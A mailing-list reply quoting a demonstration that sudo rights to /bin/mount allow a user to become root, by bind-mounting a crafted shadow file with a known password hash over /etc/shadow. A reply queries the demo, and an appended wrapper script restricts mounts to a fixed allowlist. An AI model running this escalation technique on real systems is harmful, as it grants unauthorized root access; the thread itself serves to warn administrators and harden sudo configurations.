On 23/06/19 12:07 PM, Andy Smith wrote:
> Hello,
>
> On Sat, Jun 22, 2019 at 04:44:40PM -0700, Jimmy Johnson wrote:
>> Some one mentioned mounting drives, all that and what they need can be
>> configured.
>
> Also note that anyone who can use "mount" as root can trivially become
> root. If countenancing allowing users to run "mount" as root I would
> make scripts that only mounted the exact things to the exact places,
> and then let them run those scripts as root.
>
> andy@debtest1:~$ su - bob
> Password:
> bob@debtest1:~$ whoami
> bob
> bob@debtest1:~$ sudo -i
> [sudo] password for bob:
> Sorry, user bob is not allowed to execute '/bin/bash' as root on debtest1.vps.bitfolk.com.
> bob@debtest1:~$ echo 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/
> 3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow
> bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow
> bob@debtest1:~$ su -
> Password:
> root@debtest1:~# whoami
> root
>
> The password of that hash is "letmein1".
>
> So don't give anyone sudo access to /bin/mount unless you are okay
> with them being able to become root proper if they really want to.

Haven't you just set your own (bob) password there?

Not saying you couldn't set root's instead, but ... it looks like in this case you already knew it.

Cheers,
Richard
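
The mitigation Andy describes above (scripts that mount only the exact things to the exact places), as an added example that is not part of the original thread. The script name mount-fixed, the devices, the mount points and the sudoers line are all constructed for illustration.

```shell
#!/bin/sh
# Added example: install as /usr/local/sbin/mount-fixed (root-owned, mode 0755)
# and grant only this in sudoers instead of /bin/mount, e.g. (constructed):
#   bob ALL=(root) /usr/local/sbin/mount-fixed backup, /usr/local/sbin/mount-fixed iso
# All names, devices and mount points below are constructed.

# Map an allowlisted NAME to "source target fstype options"; fail otherwise.
# nosuid,nodev: the user may control what is on the medium being mounted.
mount_spec() {
    case "$1" in
        backup) echo "/dev/disk/by-label/BACKUP /mnt/backup ext4 nosuid,nodev,noexec" ;;
        iso)    echo "/srv/images/install.iso /mnt/iso iso9660 loop,ro,nosuid,nodev" ;;
        *)      return 1 ;;
    esac
}

mount_fixed() {
    # Exactly one argument, treated as a lookup key: never a path or an option,
    # so "--bind ./myshadow /etc/shadow" cannot be expressed.
    if [ "$#" -ne 1 ]; then
        echo "usage: mount-fixed NAME" >&2
        return 2
    fi
    spec=$(mount_spec "$1") || {
        echo "mount-fixed: '$1' is not an allowed mount" >&2
        return 1
    }
    # Splitting is safe: the specs are constants without spaces or glob characters.
    set -- $spec
    # Absolute path to mount, explicit type and options; nothing comes from the caller.
    /bin/mount -t "$3" -o "$4" "$1" "$2"
}

# Run only when invoked under the installed name, so the file can also be
# sourced or tested without mounting anything.
case "${0##*/}" in
    mount-fixed) mount_fixed "$@"; exit $? ;;
esac
```

The sudoers rule should list the wrapper with each permitted NAME spelled out, so that neither the source nor the target of a mount is ever taken from the user.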